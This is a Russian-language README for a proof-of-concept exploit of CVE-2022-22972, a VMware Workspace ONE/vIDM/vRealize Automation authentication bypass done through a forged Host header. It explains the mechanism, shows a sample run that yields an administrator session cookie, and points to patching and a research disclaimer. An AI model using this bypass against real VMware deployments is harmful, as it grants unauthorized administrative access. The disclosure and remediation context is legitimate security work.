
Эксплойт-доказательство концепции для CVE-2022-22972, обходящий аутентификацию в VMware Workspace ONE, vIDM и vRealize Automation 7.6 через манипуляцию заголовком Host.
Доказательство концепции (PoC) для CVE-2022-22972, затрагивающей VMware Workspace ONE, vIDM и vRealize Automation 7.6.
Технический анализ первопричины уязвимости можно найти в нашем блоге: https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive
Этот скрипт можно использовать для обхода аутентификации на vRealize Automation 7.6 с использованием CVE-2022-22972. Workspace ONE и vIDM имеют разные конечные точки аутентификации, но суть уязвимости остается прежней. Мы будем рады принять pull-запросы, если у вас есть тестовые статьи для проверки этого процесса.
Этот скрипт работает путем изменения заголовка Host в HTTP POST-запросе к конечной точке аутентификации VMware на Host, контролируемый злоумышленником. Это заставляет приложение VMware обращаться к этому Host с учетными данными, и если Host возвращает 200, пользователь успешно аутентифицируется.
Результатом работы скрипта является файл cookie HZN, который можно включить в последующие запросы для выполнения действий от имени скомпрометированного пользователя.
ПРИМЕЧАНИЕ: Аргументы скрипта по умолчанию отправляют запрос аутентификации на наш шлюз AWS API, который настроен на ответ с кодом 200 для конкретной конечной точки, упомянутой в блоге. Вы можете изменить это с помощью опции --host. Эта конечная точка не будет получать никаких конфиденциальных данных во время эксплуатации — только запрос от уязвимого приложения с поддельным заголовком аутентификации, на который она отвечает.
dev@ubuntu:~/vmware/vra/exploit$ python3 CVE-2022-22972.py https://vra-app01.vra.intranet
Extracting state from vcac redirects...
Sending POST to auth endpoint
HZN=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJqdGkiOiJiM2E3MDJiOS01NjJkLTQwODgtYTg2Ny0xZjY5ZWE4YjAyZjMiLCJwcm4iOiJhZG1pbmlzdHJhdG9yQFZTUEhFUkUuTE9DQUwiLCJkb21haW4iOiJ2c3BoZXJlLmxvY2FsIiwidXNlcl9pZCI6IjMiLCJhdXRoX3RpbWUiOjE2NTM0MjUwOTAsImlzcyI6Imh0dHBzOi8vZWkzd3B0OTEwMC5leGVjdXRlLWFwaS51cy1lYXN0LTIuYW1hem9uYXdzLmNvbS9TQUFTL3QvdnNwaGVyZS5sb2NhbC9hdXRoIiwiYXVkIjoiaHR0cHM6Ly9laTN3cHQ5MTAwLmV4ZWN1dGUtYXBpLnVzLWVhc3QtMi5hbWF6b25hd3MuY29tL1NBQVMvdC92c3BoZXJlLmxvY2FsL2F1dGgvb2F1dGh0b2tlbiIsImN0eCI6Ilt7XCJtdGRcIjpcInVybjp2bXdhcmU6bmFtZXM6YWM6Y2xhc3NlczpMb2NhbFBhc3N3b3JkQXV0aFwiLFwiaWF0XCI6MTY1MzQyNTA5MCxcImlkXCI6M31dIiwic2NwIjoicHJvZmlsZSBhZG1pbiB1c2VyIGVtYWlsIG9wZXJhdG9yIiwiaWRwIjoiMiIsImVtbCI6ImFkbWluaXN0cmF0b3JAdnJhLWFwcDAxLnZyYS5pbnRyYW5ldCIsImNpZCI6IiIsImRpZCI6IiIsIndpZCI6IiIsInJ1bGVzIjp7ImV4cGlyeSI6MTY1MzQyNjg5MCwicnVsZXMiOlt7InJlc291cmNlcyI6WyIqIl0sImFjdGlvbnMiOlsiKiJdLCJjb25kaXRpb25zIjpudWxsfV0sImxpbmsiOm51bGx9LCJleHAiOjE2NTM0MjY4OTAsImlhdCI6MTY1MzQyNTA5MCwic3ViIjoiYWQzODkzODEtNTRmNS00ODFkLWFmNWEtOWZjNmIzOGI0NzQ0IiwicHJuX3R5cGUiOiJVU0VSIn0.Kkq2UnmqpW6yJb3GGCp7dSXc5PlU1y8YyDULIYLHIvYlB3OC4j5xFDy91a2tk4bi1lAUITymV-NUgweoCl15LXFVfBFYLEs-OAvMLKZhhGnFF-BrxmyYLPJutkxsi-gL0rF4VmYykuYw9tdUY2DghWiGGZ6QTYOts21QUzcvU-8
Set the HZN cookie in your browser to bypass authentication
Обновитесь до последней версии или примите меры, следуя инструкциям в VMSA
Это программное обеспечение создано исключительно для целей академических исследований и разработки эффективных методов защиты и не предназначено для использования для атак на системы, за исключением случаев, когда это явно разрешено. Сопровождающие проект не несут ответственности за неправомерное использование программного обеспечения. Используйте ответственно.